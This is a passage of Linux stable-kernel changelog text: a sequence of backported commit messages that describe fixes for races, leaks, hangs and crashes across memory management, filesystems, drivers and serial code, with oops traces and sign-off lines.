The data type of index is unsigned long, so index won't overflow to 0 on
64 bits architecture in this case, and the dead loop won't happen.
Since truncate_inode_pages_range() is executed with holding lock of
inode->i_rwsem, any operation related with this lock will be blocked,
and a hung task will happen, e.g.:
INFO: task truncate_test:3364 blocked for more than 120 seconds.
...
call_rwsem_down_write_failed+0x17/0x30
generic_file_write_iter+0x32/0x1c0
ubifs_write_iter+0xcc/0x170
__vfs_write+0xc4/0x120
vfs_write+0xb2/0x1b0
SyS_write+0x46/0xa0
The page with index=0xffffffff added to ->mapping is useless. Fix this
by checking the read position before allocating pages.
Link: http://lkml.kernel.org/r/1475151010-40166-1-git-send-email-fangwei1@huawei.com
Signed-off-by: Wei Fang <fangwei1@huawei.com>
Cc: Christoph Hellwig <hch@infradead.org>
Cc: Dave Chinner <david@fromorbit.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2247bb335a upstream.
Patch series "mm/hugetlb: memory offline issues with hugepages", v4.
This addresses several issues with hugepages and memory offline. While
the first patch fixes a panic, and is therefore rather important, the
last patch is just a performance optimization.
The second patch fixes a theoretical issue with reserved hugepages,
while still leaving some ugly usability issue, see description.
This patch (of 3):
dissolve_free_huge_pages() will either run into the VM_BUG_ON() or a
list corruption and addressing exception when trying to set a memory
block offline that is part (but not the first part) of a "gigantic"
hugetlb page with a size > memory block size.
When no other smaller hugetlb page sizes are present, the VM_BUG_ON()
will trigger directly. In the other case we will run into an addressing
exception later, because dissolve_free_huge_page() will not work on the
head page of the compound hugetlb page which will result in a NULL
hstate from page_hstate().
To fix this, first remove the VM_BUG_ON() because it is wrong, and then
use the compound head page in dissolve_free_huge_page(). This means
that an unused pre-allocated gigantic page that has any part of itself
inside the memory block that is going offline will be dissolved
completely. Losing an unused gigantic hugepage is preferable to failing
the memory offline, for example in the situation where a (possibly
faulty) memory DIMM needs to go offline.
Fixes: c8721bbb ("mm: memory-hotplug: enable memory hotplug to handle hugepage")
Link: http://lkml.kernel.org/r/20160926172811.94033-2-gerald.schaefer@de.ibm.com
Signed-off-by: Gerald Schaefer <gerald.schaefer@de.ibm.com>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Cc: "Kirill A . Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Mike Kravetz <mike.kravetz@oracle.com>
Cc: "Aneesh Kumar K . V" <aneesh.kumar@linux.vnet.ibm.com>
Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
Cc: Rui Teng <rui.teng@linux.vnet.ibm.com>
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5864a2fd30 upstream.
Commit 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()") introduced a
race:
sem_lock has a fast path that allows parallel simple operations.
There are two reasons why a simple operation cannot run in parallel:
- a non-simple operations is ongoing (sma->sem_perm.lock held)
- a complex operation is sleeping (sma->complex_count != 0)
As both facts are stored independently, a thread can bypass the current
checks by sleeping in the right positions. See below for more details
(or kernel bugzilla 105651).
The patch fixes that by creating one variable (complex_mode)
that tracks both reasons why parallel operations are not possible.
The patch also updates stale documentation regarding the locking.
With regards to stable kernels:
The patch is required for all kernels that include the
commit 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()") (3.10?)
The alternative is to revert the patch that introduced the race.
The patch is safe for backporting, i.e. it makes no assumptions
about memory barriers in spin_unlock_wait().
Background:
Here is the race of the current implementation:
Thread A: (simple op)
- does the first "sma->complex_count == 0" test
Thread B: (complex op)
- does sem_lock(): This includes an array scan. But the scan can't
find Thread A, because Thread A does not own sem->lock yet.
- the thread does the operation, increases complex_count,
drops sem_lock, sleeps
Thread A:
- spin_lock(&sem->lock), spin_is_locked(sma->sem_perm.lock)
- sleeps before the complex_count test
Thread C: (complex op)
- does sem_lock (no array scan, complex_count==1)
- wakes up Thread B.
- decrements complex_count
Thread A:
- does the complex_count test
Bug:
Now both thread A and thread C operate on the same array, without
any synchronization.
Fixes: 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()")
Link: http://lkml.kernel.org/r/1469123695-5661-1-git-send-email-manfred@colorfullife.com
Reported-by: <felixh@informatik.uni-bremen.de>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: <1vier1@web.de>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 07d0e9a847 upstream.
If a VFC port gets unmapped in the VIOS, it may not respond with a CRQ
init complete following H_REG_CRQ. If this occurs, we can end up having
called scsi_block_requests and not a resulting unblock until the init
complete happens, which may never occur, and we end up hanging I/O
requests. This patch ensures the host action stay set to
IBMVFC_HOST_ACTION_TGT_DEL so we move all rports into devloss state and
unblock unless we receive an init complete.
Signed-off-by: Brian King <brking@linux.vnet.ibm.com>
Acked-by: Tyrel Datwyler <tyreld@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 069d5ac9ae upstream.
Seth Forshee reports that in 4.8-rcN some automounts are failing
because the requesting the automount changed.
The relevant call path is:
follow_automount()
->d_automount
autofs4_d_automount
autofs4_mount_wait
autofs4_wait
In autofs4_wait wq_uid and wq_gid are set to current_uid() and
current_gid respectively. With follow_automount now overriding creds
uid that we export to userspace changes and that breaks existing
setups.
To remove the regression set wq_uid and wq_gid from
current_real_cred()->uid and current_real_cred()->gid respectively.
This restores the current behavior as current->real_cred is identical
to current->cred except when override creds are used.
Fixes: aeaa4a79ff ("fs: Call d_automount with the filesystems creds")
Reported-by: Seth Forshee <seth.forshee@canonical.com>
Tested-by: Seth Forshee <seth.forshee@canonical.com>
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 61ab0d403b upstream.
In sst_prepare_and_post_msg(), when a response is received in "block",
the following code gets executed:
*data = kzalloc(block->size, GFP_KERNEL);
memcpy(data, (void *) block->data, block->size);
The memcpy() call overwrites the content of the *data pointer instead of
filling the newly-allocated memory (which pointer is hold by *data).
Fix this by merging kzalloc+memcpy into a single kmemdup() call.
Thanks Joe Perches for suggesting using kmemdup()
Fixes: 60dc8dbacb ("ASoC: Intel: sst: Add some helper functions")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a8961cae29 upstream.
In the FLL parameter calculation, the FVCO should choose the maximum one.
The patch is to fix the bug about the wrong FVCO chosen.
Signed-off-by: John Hsu <KCHSU0@nuvoton.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7f00ee2bbc upstream.
Flowrings contain skbs waiting for transmission that were passed to us
by netif. It means we checked every one of them looking for 802.1x
Ethernet type. When deleting flowring we have to use freeing function
that will check for 802.1x type as well.
Freeing skbs without a proper check was leading to counter not being
properly decreased. This was triggering a WARNING every time
brcmf_netdev_wait_pend8021x was called.
Signed-off-by: Rafał Miłecki <rafal@milecki.pl>
Acked-by: Arend van Spriel <arend@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 23e9c128ad upstream.
This function is called from get_station callback which means that every
time user space was getting/dumping station(s) we were leaking 2 KiB.
Signed-off-by: Rafał Miłecki <rafal@milecki.pl>
Fixes: 1f0dc59a6d ("brcmfmac: rework .get_station() callback")
Acked-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7703773ef1 upstream.
The struct cfg80211_pmksa defines its bssid field as:
const u8 *bssid;
contrary to struct brcmf_pmksa, which uses:
u8 bssid[ETH_ALEN];
Therefore in brcmf_cfg80211_del_pmksa(), &pmksa->bssid takes the address
of this field (of type u8**), not the one of its content (which would be
u8*). Remove the & operator to make brcmf_dbg("%pM") and memcmp()
behave as expected.
This bug have been found using a custom static checker (which checks the
usage of %p... attributes at build time). It has been introduced in
commit 6c404f34f2 ("brcmfmac: Cleanup pmksa cache handling code"),
which replaced pmksa->bssid by &pmksa->bssid while refactoring the code,
without modifying struct cfg80211_pmksa definition.
Replace &pmk[i].bssid with pmk[i].bssid too to make the code clearer,
this change does not affect the semantic.
Fixes: 6c404f34f2 ("brcmfmac: Cleanup pmksa cache handling code")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d3798ae8c6 upstream.
When the underflow checks were added to workingset_node_shadow_dec(),
they triggered immediately:
kernel BUG at ./include/linux/swap.h:276!
invalid opcode: 0000 [#1] SMP
Modules linked in: isofs usb_storage fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast ip6t_REJECT nf_reject_ipv6
soundcore wmi acpi_als pinctrl_sunrisepoint kfifo_buf tpm_tis industrialio acpi_pad pinctrl_intel tpm_tis_core tpm nfsd auth_rpcgss nfs_acl lockd grace sunrpc dm_crypt
CPU: 0 PID: 20929 Comm: blkid Not tainted 4.8.0-rc8-00087-gbe67d60ba944 #1
Hardware name: System manufacturer System Product Name/Z170-K, BIOS 1803 05/06/2016
task: ffff8faa93ecd940 task.stack: ffff8faa7f478000
RIP: page_cache_tree_insert+0xf1/0x100
Call Trace:
__add_to_page_cache_locked+0x12e/0x270
add_to_page_cache_lru+0x4e/0xe0
mpage_readpages+0x112/0x1d0
blkdev_readpages+0x1d/0x20
__do_page_cache_readahead+0x1ad/0x290
force_page_cache_readahead+0xaa/0x100
page_cache_sync_readahead+0x3f/0x50
generic_file_read_iter+0x5af/0x740
blkdev_read_iter+0x35/0x40
__vfs_read+0xe1/0x130
vfs_read+0x96/0x130
SyS_read+0x55/0xc0
entry_SYSCALL_64_fastpath+0x13/0x8f
Code: 03 00 48 8b 5d d8 65 48 33 1c 25 28 00 00 00 44 89 e8 75 19 48 83 c4 18 5b 41 5c 41 5d 41 5e 5d c3 0f 0b 41 bd ef ff ff ff eb d7 <0f> 0b e8 88 68 ef ff 0f 1f 84 00
RIP page_cache_tree_insert+0xf1/0x100
This is a long-standing bug in the way shadow entries are accounted in
the radix tree nodes. The shrinker needs to know when radix tree nodes
contain only shadow entries, no pages, so node->count is split in half
to count shadows in the upper bits and pages in the lower bits.
Unfortunately, the radix tree implementation doesn't know of this and
assumes all entries are in node->count. When there is a shadow entry
directly in root->rnode and the tree is later extended, the radix tree
implementation will copy that entry into the new node and and bump its
node->count, i.e. increases the page count bits. Once the shadow gets
removed and we subtract from the upper counter, node->count underflows
and triggers the warning. Afterwards, without node->count reaching 0
again, the radix tree node is leaked.
Limit shadow entries to when we have actual radix tree nodes and can
count them properly. That means we lose the ability to detect refaults
from files that had only the first page faulted in at eviction time.
Fixes: 449dd6984d ("mm: keep page cache radix tree nodes in check")
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Reported-and-tested-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Jan Kara <jack@suse.cz>
Cc: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit edfc23ee3e upstream.
Although rare, it's possible to hit PCI error early on device
probe, meaning possibly some structs are not entirely initialized,
and some might even be completely uninitialized, leading to NULL
pointer dereference.
The i40e driver currently presents a "bad" behavior if device hits
such early PCI error: firstly, the struct i40e_pf might not be
attached to pci_dev yet, leading to a NULL pointer dereference on
access to pf->state.
Even checking if the struct is NULL and avoiding the access in that
case isn't enough, since the driver cannot recover from PCI error
that early; in our experiments we saw multiple failures on kernel
log, like:
[549.664] i40e 0007:01:00.1: Initial pf_reset failed: -15
[549.664] i40e: probe of 0007:01:00.1 failed with error -15
[...]
[871.644] i40e 0007:01:00.1: The driver for the device stopped because the
device firmware failed to init. Try updating your NVM image.
[871.644] i40e: probe of 0007:01:00.1 failed with error -32
[...]
[872.516] i40e 0007:01:00.0: ARQ: Unknown event 0x0000 ignored
Between the first probe failure (error -15) and the second (error -32)
another PCI error happened due to the first bad probe. Also, driver
started to flood console with those ARQ event messages.
This patch will prevent these issues by allowing error recovery
mechanism to remove the failed device from the system instead of
trying to recover from early PCI errors during device probe.
Signed-off-by: Guilherme G Piccoli <gpiccoli@linux.vnet.ibm.com>
Acked-by: Jacob Keller <jacob.e.keller@intel.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3ddf40e8c3 upstream.
Commit 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker
caused by replace_page_cache_page()") switched replace_page_cache() from
raw radix tree operations to page_cache_tree_insert() but didn't take
into account that the latter function, unlike the raw radix tree op,
handles mapping->nrpages. As a result, that counter is bumped for each
page replacement rather than balanced out even.
The mapping->nrpages counter is used to skip needless radix tree walks
when invalidating, truncating, syncing inodes without pages, as well as
statistics for userspace. Since the error is positive, we'll do more
page cache tree walks than necessary; we won't miss a necessary one.
And we'll report more buffer pages to userspace than there are. The
error is limited to fuse inodes.
Fixes: 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()")
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Miklos Szeredi <miklos@szeredi.hu>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a09f99edde upstream.
Fuse allowed VFS to set mode in setattr in order to clear suid/sgid on
chown and truncate, and (since writeback_cache) write. The problem with
this is that it'll potentially restore a stale mode.
The poper fix would be to let the filesystems do the suid/sgid clearing on
the relevant operations. Possibly some are already doing it but there's no
way we can detect this.
So fix this by refreshing and recalculating the mode. Do this only if
ATTR_KILL_S[UG]ID is set to not destroy performance for writes. This is
still racy but the size of the window is reduced.
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e2b8828ff upstream.
Without "default_permissions" the userspace filesystem's lookup operation
needs to perform the check for search permission on the directory.
If directory does not allow search for everyone (this is quite rare) then
userspace filesystem has to set entry timeout to zero to make sure
permissions are always performed.
Changing the mode bits of the directory should also invalidate the
(previously cached) dentry to make sure the next lookup will have a chance
of updating the timeout, if needed.
Reported-by: Jean-Pierre André <jean-pierre.andre@wanadoo.fr>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cb3ae6d25a upstream.
Make sure userspace filesystem is returning a well formed list of xattr
names (zero or more nonzero length, null terminated strings).
[Michael Theall: only verify in the nonzero size case]
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0245eb76a upstream.
Original commit, which added support for Armada CP110 system controller
used global variables for storing all clock information. It worked
fine for Armada 7k SoC, with single CP110 block. After dual-CP110 Armada 8k
was introduced, the data got overwritten and corrupted.
This patch fixes the issue by allocating resources dynamically in the
driver probe and storing it as platform drvdata.
Fixes: d3da3eaef7 ("clk: mvebu: new driver for Armada CP110 system ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Reviewed-by: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad715b268a upstream.
Armada CP110 system controller comprises its own routine responsble
for registering gate clocks. Among others 'flags' field in
struct clk_init_data was not set, using a random values, which
may cause an unpredicted behavior.
This patch fixes the problem by resetting all fields of clk_init_data
before assigning values for all gated clocks of Armada 7k/8k SoCs family.
Fixes: d3da3eaef7 ("clk: mvebu: new driver for Armada CP110 system ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72f53af265 upstream.
There is a a bug in defered ack stuff that causes a race with the
destroy of a QP.
A packet causes a defered ack to be pended by putting the QP
into an rcd queue.
A return from the driver interrupt processing will process that rcd
queue of QPs and attempt to do a direct send of the ack. At this
point no locks are held and the above QP could now be put in the reset
state in the qp destroy logic. A refcount protects the QP while it
is in the rcd queue so it isn't going anywhere yet.
If the direct send fails to allocate a pio buffer,
hfi1_schedule_send() is called to trigger sending an ack from the
send engine. There is no state test in that code path.
The refcount is then dropped from the driver.c caller
potentially allowing the qp destroy to continue from its
refcount wait in parallel with the workqueue scheduling of the qp.
Reviewed-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e728ae271f upstream.
The device lock was unnecessary obtained in bus rescan work before the
amthif client search. That causes incorrect lock ordering and task
hang:
...
[88004.613213] INFO: task kworker/1:14:21832 blocked for more than 120 seconds.
...
[88004.645934] Workqueue: events mei_cl_bus_rescan_work
...
The correct lock order is
cl_bus_lock
device_lock
me_clients_rwsem
Move device_lock into amthif init function that called
after me_clients_rwsem is released.
This fixes regression introduced by commit:
commit 025fb792ba ("mei: split amthif client init from end of clients enumeration")
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6675df311d upstream.
There are two separate issues that can lead to corrupted free space
trees.
1. The free space tree bitmaps had an endianness issue on big-endian
systems which is fixed by an earlier patch in this series.
2. btrfs-progs before v4.7.3 modified filesystems without updating the
free space tree.
To catch both of these issues at once, we need to force the free space
tree to be rebuilt. To do so, add a FREE_SPACE_TREE_VALID compat_ro bit.
If the bit isn't set, we know that it was either produced by a broken
big-endian kernel or may have been corrupted by btrfs-progs.
This also provides us with a way to add rudimentary read-write support
for the free space tree to btrfs-progs: it can just clear this bit and
have the kernel rebuild the free space tree.
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f8d468a15c upstream.
We moved the code for creating the free space tree the first time that
it's enabled, but didn't move the clearing code along with it. This
breaks my (undocumented) intention that `mount -o
clear_cache,space_cache=v2` would clear the free space tree and then
recreate it.
Fixes: 511711af91 ("btrfs: don't run delayed references while we are creating the free space tree")
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2fe1d55134 upstream.
In convert_free_space_to_{bitmaps,extents}(), we buffer the free space
bitmaps in memory and copy them directly to/from the extent buffers with
{read,write}_extent_buffer(). The extent buffer bitmap helpers use byte
granularity, which is equivalent to a little-endian bitmap. This means
that on big-endian systems, the in-memory bitmaps will be written to
disk byte-swapped. To fix this, use byte-granularity for the bitmaps in
memory.
Fixes: a5ed918285 ("Btrfs: implement the free space B-tree")
Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
Tested-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Omar Sandoval <osandov@fb.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ee6d1cb39 upstream.
Ben Greear reported:
> I see lots of instability as soon as I load up the carl9710 NIC.
> My application is going to be poking at it's debugfs files...
>
> BUG: KASAN: slab-out-of-bounds in carl9170_debugfs_read+0xd5/0x2a0
> [carl9170] at addr 0xffff8801bc1208b0
> Read of size 8 by task btserver/5888
> =======================================================================
> BUG kmalloc-256 (Tainted: G W ): kasan: bad access detected
> -----------------------------------------------------------------------
>
> INFO: Allocated in seq_open+0x50/0x100 age=2690 cpu=2 pid=772
>...
This breakage was caused by the introduction of intermediate
fops in debugfs by commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Thankfully, the original/real fops are still available in d_fsdata.
Reported-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9c4a45b17e upstream.
This patch fixes a crash that happens because b43legacy's
debugfs code expects file->f_op to be a pointer to its own
b43legacy_debugfs_fops struct. This is no longer the case
since commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51b275a6fe upstream.
This patch fixes a crash that happens because b43's
debugfs code expects file->f_op to be a pointer to
its own b43_debugfs_fops struct. This is no longer
the case since commit 9fd4dcece4
("debugfs: prevent access to possibly dead file_operations at file open")
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 86f0e06767 upstream.
This patch introduces an accessor which can be used
by the users of debugfs (drivers, fs, ...) to get the
original file_operations struct. It also removes the
REAL_FOPS_DEREF macro in file.c and converts the code
to use the public version.
Previously, REAL_FOPS_DEREF was only available within
the file.c of debugfs. But having a public getter
available for debugfs users is important as some
drivers (carl9170 and b43) use the pointer of the
original file_operations in conjunction with container_of()
within their debugfs implementations.
Reviewed-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cd5d38b052 upstream.
Commit d9676fa152 ("ARCv2: Enable LOCKDEP"), changed
local_save_flags() to not return raw STATUS32 but encoded in the form
such that it could be fed directly to CLRI/SETI instructions.
However the STATUS32.E[] was not captured correctly as it corresponds to
bits [4:1] in the register and not [3:0]
Fixes: d9676fa152 ("ARCv2: Enable LOCKDEP")
Cc: Evgeny Voevodin <evgeny.voevodin@intel.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bc0c7ece61 upstream.
In the end of "arc_init_IRQ" STATUS32.IE flag is going to be affected by
"flag" instruction but "flag" never touches IE flag on ARCv2. So "kflag"
instruction must be used instead of "flag".
Signed-off-by: Yuriy Kolerov <yuriy.kolerov@synopsys.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b3965767d8 upstream.
There are calls to serial8250_rpm_{get|put}() in __do_stop_tx_rs485() that are
certainly placed in a wrong location. I dunno how it had been tested with
runtime PM enabled because it is obvious "sleep in atomic context" error.
Besides that serial8250_rpm_get() is called immediately after an IO just
happened. It implies that the device is already powered on, see implementation
of serial8250_em485_rts_after_send() and serial8250_clear_fifos() for the
details.
There is no bug have been seen due to, as I can guess, use of auto suspend mode
when scheduled transaction to suspend is invoked quite lately than it's needed
for a few writes to the port. It might be possible to trigger a warning if
stop_tx_timer fires when device is suspended.
Refactor the code to use runtime PM only in case of timer function.
Fixes: 0c66940d58 ("tty/serial/8250: fix RS485 half-duplex RX")
Cc: "Matwey V. Kornilov" <matwey@sai.msu.ru>
Tested-by: Yegor Yefremov <yegorslists@googlemail.com>
Signed-off-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ae9fdefb6 upstream.
Since commit 18dfef9c7f ("serial: atmel: convert to irq handling
provided mctrl-gpio"), interrupts from GPIOs are not disabled any more
when the serial port is closed, leading to an oops when the one of the
input pin is toggled (CTS/DSR/DCD/RNG).
This is only the case if those pins are used as GPIOs, i.e. declared
like that:
usart1: serial@f8020000 {
/* CTS and DTS will be handled by GPIO */
status = "okay";
rts-gpios = <&pioB 17 GPIO_ACTIVE_LOW>;
cts-gpios = <&pioB 16 GPIO_ACTIVE_LOW>;
dtr-gpios = <&pioB 14 GPIO_ACTIVE_LOW>;
dsr-gpios = <&pioC 31 GPIO_ACTIVE_LOW>;
rng-gpios = <&pioB 12 GPIO_ACTIVE_LOW>;
dcd-gpios = <&pioB 15 GPIO_ACTIVE_LOW>;
};
That's because modem interrupts used to be freed in atmel_shutdown().
After commit 18dfef9c7f ("serial: atmel: convert to irq handling
provided mctrl-gpio"), this code was just removed.
Calling atmel_disable_ms() disables the interrupts and everything works
fine again.
Tested on at91sam9g35-cm
(This patch doesn't apply on -stable kernels, fixes for 4.4 and 4.7 will
be sent after this one is applied.)
Signed-off-by: Richard Genoud <richard.genoud@gmail.com>
Fixes: 18dfef9c7f ("serial: atmel: convert to irq handling provided mctrl-gpio")
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4b75f80003 upstream.
The USR2_DCDIN bit is tested for in register usr1. As the name
suggests the usr2 register should be used instead. This fixes
reading the Carrier detect status.
Signed-off-by: Sascha Hauer <s.hauer@pengutronix.de>
Fixes: 90ebc48386 ("serial: imx: repair and complete handshaking")
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 19be0eaffa upstream.
This is an ancient bug that was actually attempted to be fixed once
(badly) by me eleven years ago in commit 4ceb5db975 ("Fix
get_user_pages() race for write access") but that was then undone due to
problems on s390 by commit f33ea7f404 ("fix get_user_pages bug").
In the meantime, the s390 situation has long been fixed, and we can now
fix it by checking the pte_dirty() bit properly (and do it better). The
s390 dirty bit was implemented in abf09bed3c ("s390/mm: implement
software dirty bits") which made it into v3.9. Earlier kernels will
have to look at the page state itself.
Also, the VM has become more scalable, and what used a purely
theoretical race back then has become easier to trigger.
To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
we already did a COW" rather than play racy games with FOLL_WRITE that
is very fundamental, and then use the pte dirty flag to validate that
the FOLL_COW flag is still valid.
Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
Acked-by: Hugh Dickins <hughd@google.com>
Reviewed-by: Michal Hocko <mhocko@suse.com>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Kees Cook <keescook@chromium.org>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: Willy Tarreau <w@1wt.eu>
Cc: Nick Piggin <npiggin@gmail.com>
Cc: Greg Thelen <gthelen@google.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 791cc43b36 upstream.
Commit 2a6fba6 "xfs: only return -errno or success from attr ->put_listent"
changes the returnvalue of __xfs_xattr_put_listen to 0 in case when there is
insufficient space in the buffer assuming that setting context->count to -1
would be enough, but all of the ->put_listent callers only check seen_enough.
This results in a failed assertion:
XFS: Assertion failed: context->count >= 0, file: fs/xfs/xfs_xattr.c, line: 175
in insufficient buffer size case.
This is only reproducible with at least 2 xattrs and only when the buffer
gets depleted before the last one.
Furthermore if buffersize is such that it is enough to hold the last xattr's
name, but not enough to hold the sum of preceeding xattr names listxattr won't
fail with ERANGE, but will suceed returning last xattr's name without the
first character. The first character end's up overwriting data stored at
(context->alist - 1).
Signed-off-by: Artem Savkov <asavkov@redhat.com>
Reviewed-by: Dave Chinner <dchinner@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Cc: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d5644b7d8 upstream.
Runtime PM should be configured already once we call device_add. See
